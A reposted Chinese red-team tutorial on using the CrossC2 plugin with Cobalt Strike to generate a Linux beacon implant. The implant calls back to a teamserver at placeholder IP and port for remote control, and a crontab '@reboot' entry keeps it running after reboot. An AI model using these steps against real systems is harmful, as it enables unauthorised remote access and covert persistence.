标签：插件 上线 Linux CobaltStrike genCrossC2 cobaltstrike test 服务端

在红蓝对抗中，我们常需要对目标进行长时间的控制，cobaltstrike原生对于上线windows比较轻松友好，但如果是Linux平台就需要用到第三方插件了。

---

准备工作

这里使用CrossC2的插件，类似于在linux上反弹一个cobaltstrike类的shell。

github：https://github.com/gloxec/CrossC2

下载时注意自己的cs版本（我这里使用的是3.0.2的最新版插件，cs版本为4.3）

需要下载以下两个文件：

CrossC2***.cna、genCrossC2.Linux

由于我的木马是在linux平台生成的，因此使用genCrossC2.Linux，可根据自己平台的差异自行选择

---

服务端部署

cobaltstrike服务端部署

chmod +x teamserver
./teamserver [ip] [password]

---

客户端连接

建立一个监听器，需要注意的是crossc2插件只支持https的beacon

安装crossc2

---

生成木马

我这里是在服务端的cobaltstrike目录直接生成的，如果在非服务端生成需要将服务端根目录的隐藏文件.cobaltstrike.beacon_keys复制下来放到cs根目录

chmod +x genCrossC2.Linux
./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test

---

上线

在目标靶机上直接运行就可以看到上线了.

chmod +x test
./test

---

权限维持

一个简单的思想就是将其添加的系统启动项

有很多种方法，这里讲个最简单的，通过计划任务的方式实现

crontab -e
@reboot /tmp/test

这样每次重启之后都能重新执行

这里需要注意的是要设置以下次登录的用户的crontab

标签：插件,上线,Linux,CobaltStrike,genCrossC2,cobaltstrike,test,服务端
来源： https://blog.csdn.net/qq_35664104/article/details/121267679

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。